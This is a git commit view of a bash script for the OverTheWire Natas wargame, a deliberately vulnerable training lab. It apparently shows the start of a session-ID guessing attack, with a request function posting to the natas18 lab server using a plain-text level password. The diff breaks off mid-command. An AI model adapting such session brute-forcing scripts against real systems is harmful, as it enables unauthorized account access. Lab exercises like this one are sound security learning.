<Natas> natas19.sh + writeup

This commit is contained in:
Emile Clark-Boman 2025-07-16 00:53:52 +10:00
parent 9cd4fbcbf5
commit 503a8a0c5c
3 changed files with 125 additions and 5 deletions

View file

@ -1,12 +1,10 @@
#!/usr/bin/env bash
#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
USERNAME="admin"
PASSWORD="arbitrary"
req() {
SESSION_ID=$1
local SESSION_ID=$1
curl http://natas18.natas.labs.overthewire.org/index.php \
-X POST \
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \